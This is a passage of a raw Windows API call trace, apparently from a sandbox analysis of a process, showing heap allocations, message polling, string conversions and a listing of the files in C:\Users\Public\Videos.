0x24a9c78 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0268.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0268.231] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0268.231] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0268.231] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.233] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0268.233] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0268.233] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0268.233] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.233] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0268.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0268.234] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.234] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0268.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0268.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0268.235] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0268.235] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0268.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0268.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0268.236] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.236] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0268.237] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.237] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.237] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0268.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x9) returned 0x24a9e88 [0268.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[\\\\/]+\\z", cchWideChar=9, lpMultiByteStr=0x24a9e88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\\\\/]+\\z", lpUsedDefaultChar=0x0) returned 9 [0268.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x52) returned 0x249a7e0 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0268.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x17) returned 0x2466e10 [0268.238] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Public\\Videos", cchWideChar=23, lpMultiByteStr=0x2466e10, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Public\\Videos", lpUsedDefaultChar=0x0) returned 23 [0268.238] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0268.238] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0268.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2e) returned 0x24b3618 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0268.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0268.239] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b6a58, cbMultiByte=23, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2e) returned 0x24b35e0 [0268.239] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x24b6a58, cbMultiByte=23, lpWideCharStr=0x24b35e0, cchWideChar=23 | out: lpWideCharStr="C:\\Users\\Public\\Videos") returned 23 [0268.239] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0268.239] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3538 [0268.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0268.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0268.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0268.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3538 | out: hHeap=0x25c0000) returned 1 [0268.240] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0268.240] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.240] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0268.241] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0268.241] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.241] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.242] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0268.242] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0268.243] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb4b004d, dwReserved1=0x40, cFileName=".", cAlternateFileName="")) returned 0xaa58e0 [0268.243] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb4b004d, dwReserved1=0x40, cFileName="..", cAlternateFileName="")) returned 1 [0268.243] FindNextFileW (in: hFindFile=0xaa58e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xb4b004d, dwReserved1=0x40, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.243] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.243] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.244] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.244] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0268.244] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.244] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.244] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0268.245] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0268.245] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.245] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0268.246] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0268.246] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 